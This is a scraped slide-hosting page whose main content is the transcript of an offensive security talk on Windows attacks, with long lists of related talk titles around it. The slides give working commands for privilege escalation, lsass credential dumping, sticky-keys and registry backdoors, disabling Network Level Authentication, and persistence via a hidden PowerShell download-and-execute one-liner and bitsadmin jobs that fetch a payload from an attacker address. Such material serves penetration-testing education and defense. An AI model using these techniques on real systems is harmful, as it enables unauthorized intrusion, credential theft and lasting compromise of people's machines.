[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
 
Harmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetHarmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and Puppet
 
Virtually Pwned
Virtually PwnedVirtually Pwned
Virtually Pwned
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
 
Free tools for win server administration
Free tools for win server administrationFree tools for win server administration
Free tools for win server administration
 
Windows guest debugging presentation from KVM Forum 2012
Windows guest debugging presentation from KVM Forum 2012Windows guest debugging presentation from KVM Forum 2012
Windows guest debugging presentation from KVM Forum 2012
 
Powervc upgrade from_1.3.0.2_to_1.3.2.0
Powervc upgrade from_1.3.0.2_to_1.3.2.0Powervc upgrade from_1.3.0.2_to_1.3.2.0
Powervc upgrade from_1.3.0.2_to_1.3.2.0
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
introduction-infra-as-a-code using terraform
introduction-infra-as-a-code using terraformintroduction-infra-as-a-code using terraform
introduction-infra-as-a-code using terraform
 
The How and Why of Windows containers
The How and Why of Windows containersThe How and Why of Windows containers
The How and Why of Windows containers
 
Testing Terraform
Testing TerraformTesting Terraform
Testing Terraform
 
Moving a Windows environment to the cloud - DevOps Galway Meetup
Moving a Windows environment to the cloud - DevOps Galway MeetupMoving a Windows environment to the cloud - DevOps Galway Meetup
Moving a Windows environment to the cloud - DevOps Galway Meetup
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
 
Modern tooling to assist with developing applications on FreeBSD
Modern tooling to assist with developing applications on FreeBSDModern tooling to assist with developing applications on FreeBSD
Modern tooling to assist with developing applications on FreeBSD
 
Azure from scratch part 4
Azure from scratch part 4Azure from scratch part 4
Azure from scratch part 4
 

More from Rob Fuller

Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
KiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's AssetsKiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's AssetsRob Fuller
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at youRob Fuller
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Rob Fuller
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersRob Fuller
 
As The Phish Turns
As The Phish TurnsAs The Phish Turns
As The Phish TurnsRob Fuller
 
RIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRob Fuller
 
Metasploit magic the dark coners of the framework
Metasploit magic   the dark coners of the frameworkMetasploit magic   the dark coners of the framework
Metasploit magic the dark coners of the frameworkRob Fuller
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy StyleRob Fuller
 
Intro to White Chapel
Intro to White ChapelIntro to White Chapel
Intro to White ChapelRob Fuller
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSRob Fuller
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
 
Memory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: FirefoxMemory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: FirefoxRob Fuller
 
From Couch To Career In 80 Hours
From Couch To Career In 80 HoursFrom Couch To Career In 80 Hours
From Couch To Career In 80 HoursRob Fuller
 

More from Rob Fuller (16)

Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?
 
KiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's AssetsKiwiCon 2016 - Kicking Orion's Assets
KiwiCon 2016 - Kicking Orion's Assets
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at you
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
 
GiTFO
GiTFOGiTFO
GiTFO
 
NotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for PentestersNotaCon 2011 - Networking for Pentesters
NotaCon 2011 - Networking for Pentesters
 
As The Phish Turns
As The Phish TurnsAs The Phish Turns
As The Phish Turns
 
RIT 2009 Intellectual Pwnership
RIT 2009 Intellectual PwnershipRIT 2009 Intellectual Pwnership
RIT 2009 Intellectual Pwnership
 
Metasploit magic the dark coners of the framework
Metasploit magic   the dark coners of the frameworkMetasploit magic   the dark coners of the framework
Metasploit magic the dark coners of the framework
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy Style
 
Intro to White Chapel
Intro to White ChapelIntro to White Chapel
Intro to White Chapel
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNS
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Memory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: FirefoxMemory Forensics for Pentesters: Firefox
Memory Forensics for Pentesters: Firefox
 
From Couch To Career In 80 Hours
From Couch To Career In 80 HoursFrom Couch To Career In 80 Hours
From Couch To Career In 80 Hours
 

Recently uploaded

How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17Celine George
 
How to create _name_search function in odoo 17
How to create _name_search function in odoo 17How to create _name_search function in odoo 17
How to create _name_search function in odoo 17Celine George
 
4.9.24 School Desegregation in Boston.pptx
4.9.24 School Desegregation in Boston.pptx4.9.24 School Desegregation in Boston.pptx
4.9.24 School Desegregation in Boston.pptxmary850239
 
Objectives n learning outcoms - MD 20240404.pptx
Objectives n learning outcoms - MD 20240404.pptxObjectives n learning outcoms - MD 20240404.pptx
Objectives n learning outcoms - MD 20240404.pptxMadhavi Dharankar
 
Farrington HS Streamlines Guest Entrance
Farrington HS Streamlines Guest EntranceFarrington HS Streamlines Guest Entrance
Farrington HS Streamlines Guest Entrancejulius27264
 
Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17Celine George
 
18. Training and prunning of horicultural crops.pptx
18. Training and prunning of horicultural crops.pptx18. Training and prunning of horicultural crops.pptx
18. Training and prunning of horicultural crops.pptxUmeshTimilsina1
 
4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptx4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptxmary850239
 
Indexing Structures in Database Management system.pdf
Indexing Structures in Database Management system.pdfIndexing Structures in Database Management system.pdf
Indexing Structures in Database Management system.pdfChristalin Nelson
 
Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...
Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...
Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...DrVipulVKapoor
 
Jason Potel In Media Res Media Component
Jason Potel In Media Res Media ComponentJason Potel In Media Res Media Component
Jason Potel In Media Res Media ComponentInMediaRes1
 
Paul Dobryden In Media Res Media Component
Paul Dobryden In Media Res Media ComponentPaul Dobryden In Media Res Media Component
Paul Dobryden In Media Res Media ComponentInMediaRes1
 
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...Nguyen Thanh Tu Collection
 
Congestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationCongestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationdeepaannamalai16
 
Grade Three -ELLNA-REVIEWER-ENGLISH.pptx
Grade Three -ELLNA-REVIEWER-ENGLISH.pptxGrade Three -ELLNA-REVIEWER-ENGLISH.pptx
Grade Three -ELLNA-REVIEWER-ENGLISH.pptxkarenfajardo43
 
6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroomSamsung Business USA
 

Recently uploaded (20)

Mattingly "AI & Prompt Design" - Introduction to Machine Learning"
Mattingly "AI & Prompt Design" - Introduction to Machine Learning"Mattingly "AI & Prompt Design" - Introduction to Machine Learning"
Mattingly "AI & Prompt Design" - Introduction to Machine Learning"
 
How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17How to Manage Buy 3 Get 1 Free in Odoo 17
How to Manage Buy 3 Get 1 Free in Odoo 17
 
How to create _name_search function in odoo 17
How to create _name_search function in odoo 17How to create _name_search function in odoo 17
How to create _name_search function in odoo 17
 
4.9.24 School Desegregation in Boston.pptx
4.9.24 School Desegregation in Boston.pptx4.9.24 School Desegregation in Boston.pptx
4.9.24 School Desegregation in Boston.pptx
 
CARNAVAL COM MAGIA E EUFORIA _
CARNAVAL COM MAGIA E EUFORIA            _CARNAVAL COM MAGIA E EUFORIA            _
CARNAVAL COM MAGIA E EUFORIA _
 
Objectives n learning outcoms - MD 20240404.pptx
Objectives n learning outcoms - MD 20240404.pptxObjectives n learning outcoms - MD 20240404.pptx
Objectives n learning outcoms - MD 20240404.pptx
 
Farrington HS Streamlines Guest Entrance
Farrington HS Streamlines Guest EntranceFarrington HS Streamlines Guest Entrance
Farrington HS Streamlines Guest Entrance
 
Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17
 
Spearman's correlation,Formula,Advantages,
Spearman's correlation,Formula,Advantages,Spearman's correlation,Formula,Advantages,
Spearman's correlation,Formula,Advantages,
 
18. Training and prunning of horicultural crops.pptx
18. Training and prunning of horicultural crops.pptx18. Training and prunning of horicultural crops.pptx
18. Training and prunning of horicultural crops.pptx
 
Teaching Critical AI Literacies - Maha Bali
Teaching Critical AI Literacies - Maha BaliTeaching Critical AI Literacies - Maha Bali
Teaching Critical AI Literacies - Maha Bali
 
4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptx4.9.24 Social Capital and Social Exclusion.pptx
4.9.24 Social Capital and Social Exclusion.pptx
 
Indexing Structures in Database Management system.pdf
Indexing Structures in Database Management system.pdfIndexing Structures in Database Management system.pdf
Indexing Structures in Database Management system.pdf
 
Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...
Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...
Geoffrey Chaucer Works II UGC NET JRF TGT PGT MA PHD Entrance Exam II History...
 
Jason Potel In Media Res Media Component
Jason Potel In Media Res Media ComponentJason Potel In Media Res Media Component
Jason Potel In Media Res Media Component
 
Paul Dobryden In Media Res Media Component
Paul Dobryden In Media Res Media ComponentPaul Dobryden In Media Res Media Component
Paul Dobryden In Media Res Media Component
 
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
 
Congestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationCongestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentation
 
Grade Three -ELLNA-REVIEWER-ENGLISH.pptx
Grade Three -ELLNA-REVIEWER-ENGLISH.pptxGrade Three -ELLNA-REVIEWER-ENGLISH.pptx
Grade Three -ELLNA-REVIEWER-ENGLISH.pptx
 
6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom
 

Windows Attacks AT is the new black

  • 1. Attacks AT is the new BLACK
  • 2. About Me mubix NoVA Hackers Co-founder Marine Corps Hak5 Metasploit Dad Husband
  • 3. About Me cg carnal0wnage NoVA Hackers Co-founder Lares carnal0wnage.attackresearch.com
  • 4. What we're gonna talk about ● Tricks/Misconfigurations as a user ● Escalation from admin-->system ● Persistence ● Forced Authentication ● Misc
  • 5. Encyclopedia of Windows Privilege Escalation By Brett More Ruxcon 2012 http://www.docstoc.com/docs/112350262/Windows-Priv-Esc http://www.youtube.com/watch?v=kMG8IsCohHA This is an addition, lots of good info there that won’t necessarily be covered here.
  • 7. Old Skewl Local Exploits Taviso bug sysret etc More and more are baked into frameworks and run via their agent - MSF, Canvas, Core Impact *normally* not an issue but occasionally not having a .exe to run is a bummer
  • 8. Keyloggers You have to be SYSTEM to get into winlogon for the user. BUT, every time i’ve keylogged (lately) they’ve typed their domain creds into something i could capture as a user.
  • 10. Look For Creds On The Box You might find creds on the box. Examples dir /s *pass* dir /s *cred* dir /s *vnc* dir /s *.config type C:sysprep.inf [clear] type C:sysprepsysprep.xml [base64] Is their truecrypt/PGP drive mapped?
  • 11. Look For Creds On The Box You might find creds on the box. Examples post/windows/gather/credentials/*
  • 12. GPP Group Policy Preference XML files include an encrypted set of credentials (if credentials are used), these are used for new users, making shares, etc etc. The encryption is documented. Free passwords! Source: http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html Original Source (down) : http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences Key: http://msdn.microsoft.com/en-us/library/cc422924.aspx
  • 13. Unattended Installs - Client Unattended.xml is a file that is left on a system after an unattended install, many times setting the local administrator password Usually found in: %WINDIR%PantherUnattend %WINDIR%Panther http://rewtdance.blogspot.com/2012/11/windows-deployment-services-clear-text.html
  • 14. Unattended Installs - Server No authentication is needed to gather Unattended.xml Just need to find the "Windows Deployment Services" server auxiliary/scanner/dcerpc/windows_deployment _services
  • 15. Unattended Installs - Server Windows Deployment Services aren’t the only methods to do Unattended installs. But the Unattend.xml is a standard. Find it == Win
  • 16. Unattended Installs - Server http://technet.microsoft.com/en- us/library/cc766271(v=ws.10).aspx <LocalAccounts> <LocalAccount wcm:action="add"> <Password> <Value>cAB3AFAAYQBzAHMAdwBvAHIAZAA</Value> <PlainText>false</PlainText> </Password> <Description>Test account</Description> <DisplayName>Admin/Power User Account</DisplayName> <Group>Administrators;Power Users</Group> <Name>Test1</Name> </LocalAccount> cAB3AFAAYQBzAHMAdwBvAHIAZAA == pwPassword (‘pw‘ is the password) Base64 encoded != PlainText ;-)
  • 18. User Permissions Domain User == Local Administrator on the host Domain User == Power User on the host http://blogs.technet.com/b/markrussinovich/archive/2006/05/01/the-power-in-power-users.aspx All Domain Users == Local Admins on all hosts Many Domain Groups = Local Admins on all hosts
  • 19. Binpath Service Modify accesschk.exe -uwcq * | findstr /v AUTHORITY | findstr /v Administrators (remember not all languages spell “Administrators” the same) Binpath mod: sc config badsrvc binpath= "net user bob /add" type= interact sc start badsrvc sc stop badsrvc
  • 21. AlwaysInstallElevated Setting used to allow standard users to install MSI files without having to be admins. HKLMSOFTWAREPoliciesMicrosoftWindows InstallerAlwaysInstallElevated HKCUSOFTWAREPoliciesMicrosoftWindow sInstallerAlwaysInstallElevated
  • 22. Missing Autoruns C:sysinternals>autorunsc.exe -a | findstr /n /R "File not found" 131: File not found: C:Program Files (x86)BlueStacksHD-Service.exe BstHdAndroidSvc Android 338: c:windowsmicrosoft.netframework64v3.0windows communication foundationinfocard.exe 1248: File not found: C:Program Files (x86)BlueStacksHD-Hypervisor- amd64.sys 2262: File not found: System32driverssynth3dvsc.sys 2326: File not found: system32driverstsusbhub.sys 2479: File not found: System32driversrdvgkmd.sys
  • 23. Service Quoting - CVE-2000-1128 wmic service get name,displayname,pathname, startmode |findstr /i "auto" |findstr /i /v "c: windows" |findstr /i /v """ (XP requires admin access to use, Vista+ users can run) Non admin on XP, 1 by 1: sc qc "NVIDIA Update Service Daemon"
  • 24. Service Quoting (Manual) sc query Get list of services sc qc skypeupdate [SC] QueryServiceConfig SUCCESS SERVICE_NAME: skypeupdate TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : "C:Program Files (x86)SkypeUpdaterUpdater.exe" <--Not Vulnerable LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Skype Updater DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem
  • 25. Service Quoting (Manual) sc query Get list of services sc qc LENOVO.TPKNRSVC [SC] QueryServiceConfig SUCCESS SERVICE_NAME: LENOVO.TPKNRSVC TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:Program FilesLenovoCommunications UtilityTPKNRSVC.exe <--Vulnerable LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Lenovo Keyboard Noise Reduction DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  • 26. Service Quoting Example: NVIDIA Update Service Daemon C:Program Files (x86)NVIDIA CorporationNVIDIA Update Coredaemonu.exe C:Program.exe C:Program Files (x86)NVIDIA.exe C:Program Files (x86)NVIDIA CorporationNVIDIA.exe Lenovo Keyboard Noise Reduction C:Program FilesLenovoCommunications UtilityTPKNRSVC.exe C:Program.exe C:Program FilesLenovoCommunications.exe
  • 27. DLL Loading or Bad permissions fxsst.dll - looks in C:Windows first, the where it really is C:WindowsSystem32 Source: https://github.com/rapid7/metasploit-framework/pull/1103
  • 28. Pentest Monkey Script to Check pentest monkey’s priv check tool Source: http://pentestmonkey.net/tools/windows-privesc-check
  • 30. MSF getsystem getsystem -t 1 :-) requires meterpreter work anywhere else? can do manually?
  • 31. Sysinternals psexec psexec -i -s -d cmd.exe psexec: http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
  • 32. Binary Replacement Replace binary called by a service with YOUR binary 1. stop service 2. replace binary 3. start service **Usually works for Power Users too** Source: http://www.madhur.co.in/blog/2011/09/23/privilegeescalation.html
  • 33. WMIC wmic /node:DC1 /user: DOMAINdomainadminsvc /password: domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > C: tempoutput.txt" Source: http://www.room362.com/blog/2013/6/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part1. html
  • 34. AT at 13:20 /interactive cmd net use targetserver /user:DOMuser pass net time targetserver at targetserver 13:20 C:tempevil.bat Executes as SYSTEM Must be an admin to do it Easy way to check "whoami /groups" on Vista+
  • 35. Debugging CMD.exe Start the debugging: at 13:37 C:debuggersremote.exe /s cmd SYSCMD Connect to the debugger: C:debuggersremote.exe /c 127.0.0.1 SYSCMD NTSD can be used for this as well Source: http://carnal0wnage.attackresearch.com/2013/07/admin-to-system-win7-with-remoteexe.html NTSD: http://www.securityaegis.com/ntsd-backdoor/
  • 36. schtasks Wonderful new features! 1. Any user can create a task 2. I have new options other than "ONCE", like ONIDLE, ONLOGON, and ONSTART Scenario 1: ONIDLE run my C2 check-in binary Scenario 2: ONLOGON run my cred dumper bin Scenario 3: ONSTART copy evil bin to random location and start it.
  • 37. Bypass UAC w/ Creds UAC will not let local accounts authenticate locally to elevate past UAC Domain accounts have no such restriction. Utilize Metasploit's PSEXEC + Domain account that is an admin on the box you are on = No UAC no more. Source: http://mubix.github.io/blog/2013/08/11/psexec-uac-bypass-with-credentials/
  • 39. Passwords - best persistence method WCE and Mimikatz wdigest (your AD password) kerberos (your LM / NTLM hash) ssp (your Outlook password) livessp (your windows8 password) msv (your AD password) tspkg (your AD password) WCE: http://www.ampliasecurity.com/research/wcefaq.html Mimikatz: http://blog.gentilkiwi.com/mimikatz
  • 40. Passwords through process dumping net use targetserver /user:DOMuser pass copy procdump.exe targetserverc$ copy procdump.bat targetserverc$ procdump.exe -ma lsass %CNAME%.dmp at targetserver 13:37 C:procdump.bat copy targetserverc$targetserver.dmp . game over... Source: http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a. html
  • 41. Ol’ Reliable Put binary or .bat script in a startup folder yeah shouldnt work, but it does… Registry run keys
  • 42. SETHC / UTILMAN Replace %WINDIR%System32sethc.exe Replace %WINDIR%System32utilman.exe Hit SHIFT 5 times = sethc.exe run by SYSTEM Win Key + U = utilman.exe run by SYSTEM Files locked by Windows, must be done "offline" If NLA (Network Layer Authentication) is enabled, won't work If RDP is disabled, won't work Source: http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html
  • 43. SETHC / UTILMAN - NO REBOOT HKLMSoftwareMicrosoftWindows NTCurrentVersionImage File Execution Options make a key called "sethc.exe" make a REG_SZ value called "Debugger" (capitalized) give it "calc.exe" as the value Hit SHIFT 5 times. Source: http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html
  • 44. SETHC / UTILMAN - CONNECTIVITY Enable RDP: reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTermin al Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Disable NLA: reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTermin al ServerWinStationsRDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f Firewall exception for RDP: netsh firewall set service type = remotedesktop mode = enable Source: http://www.room362.com/blog/2012/5/25/sticky-keys-and-utilman-against-nla.html
  • 45. Teredo IPv6 + Bindshell netsh interface ipv6 install netsh interface ipv6 teredo enterpriseclient netsh interface ipv6 teredo set client teredo. managemydedi.com msfpayload windows/meterpreter/bind_ipv6_tcp Create a loop that runs the payload, then pings your IPv6 address, wait for user to take their laptop home. Source: http://www.room362.com/blog/2010/9/24/revenge-of-the-bind-shell.html
  • 46. Rename on next reboot HKLMSystemCurrentControlSetControlSessi on ManagerPendingFileRenameOperations Image from: http://education.aspu.ru/view.php?wnt=280
  • 47. Exporting Wireless Configs netsh wlan export profile key=clear <sharedKey> <keyType>passPhrase</keyType> <protected>false</protected> <keyMaterial>myPasswrd</keyMaterial> </sharedKey> Source: http://www.digininja.org/metasploit/getwlanprofiles.php
  • 48. Powershell Downloader Schedule this and it will execute the shellcode on that page, pulling it each time (so you can change as needed) powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient). downloadstring('http://192.168.172.1: 8080/myHbBywMxOSB'))" Source: http://securitypadawan.blogspot.com/2013/07/authenticated-metasploit-payloads-via.html
  • 49. BITSADMIN Downloader/Exec bitsadmin /create mybackdoor BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. Created job {6C79ABFA-F7AA-4411-B74D- B790666E130F}. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
  • 50. BITSADMIN Downloader/Exec bitsadmin /addfile mybackdoor http://192. 168.222.150/myshell.exe C: windowstempmyshell.exe BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. Added http://192.168.222.150/myshell.exe -> C:windowstempmyshell.exe to job. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
  • 51. BITSADMIN Downloader/Exec bitsadmin /SETMINRETRYDELAY mybackdoor 86400 BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. Minimum retry delay set to 86400. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
  • 52. BITSADMIN Downloader/Exec bitsadmin /SETNOTIFYCMDLINE mybackdoor C: windowstempmyshell.exe NULL BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. notification command line set to 'C: windowstempmyshell.exe' 'NULL'. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
  • 53. BITSADMIN Downloader/Exec bitsadmin /getnotifycmdline mybackdoor the notification command line is 'C: windowstempmyshell.exe' 'NULL' bitsadmin /listfiles mybackdoor 0 / UNKNOWN WORKING http://192.168.222.150 /myshell.exe -> C:windowstempmyshell.exe bitsadmin /RESUME mybackdoor Job resumed. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
  • 54. Password Filters (requires reboot) Dump DLL in %WINDIR%System32 Update: HKLMSYSTEMCurrentControlSetControlLsa Notification Packages Sit and wait for clear text passwords as defined functionality by Microsoft: http://msdn.microsoft.com/en- us/library/windows/desktop/ms721882(v=vs.
  • 55. Password Filters hooking, no reboot Reflective DLL injection w/ Powershell (in- memory) hooking.
  • 56. SSPI (requires reboot) Kiwissp.dll 1. compile 2. drop in system32 3. “Security Packages” registry key 4. wait for passwords
  • 57. Command Line PPTP Tunnel post/windows/manage/pptp_tunnel Create a PPTP tunnel between victim and attacker. Microsoft intentionally created PPTP to be resilient to network drops and changes. Source: http://www.shelliscoming.com/2013/06/metasploit-man-in-middle-through-pptp.html
  • 58. Just uninstall a patch Not recommended for clients, but if you need back on a system, make it vulnerable.
  • 61. LNK (Shortcuts) with UNC icons Create a shortcut to anything (cmd.exe) Go to Properties -> Change Icon and give it a UNC path. Source http://www.room362.com/blog/2012/2/11/ms08_068-ms10_046-fun-until-2018.html
  • 62. Auth and Persistence Anyone see what I did? Source: http://carnal0wnage.attackresearch.com/2013/09/finding-executable-hijacking.html Used in conjunction with this REG key can be devastating: HKLMSYSTEM CurrentControlSetControl Session Manager CWDIllegalInDllSearch = 0
  • 63. Misc
  • 64. WinRM Windows Remote Management - includes WinRS (Windows Remote Shell) Listens on 5985/5986 by default, allows interactive shell access over HTTP. Old versions and those installed with IIS are on 80 Found by asking servers for /wsman and recording 402s
  • 65. Injecting CAs post/windows/manage/inject_ca & remove_ca Throws a CA on a system, code signing, web, etc. Can be used to bypass application whitelisting (if "signed-good" binaries are allowed) Also can allow you to proxy all SSL traffic for a user, without any warnings to them. vt ( Nick Freeman @ Security-Assessment.com )
  • 66. WPAD, WPADWPADWPAD & LLMNR Auto detects proxy Looks for WPAD IPv6 version (LLMNR) Looks for WPADWPADWPAD You get to set their proxy information ;-)
  • 67. PORTPROXY Basically port forwarding built into Windows Firewall. Modes: v4tov4 v4tov6 v6tov4 v6tov6 Oh yea… Plus if you’re lazy (there is a module for that): post/windows/manage/portproxy
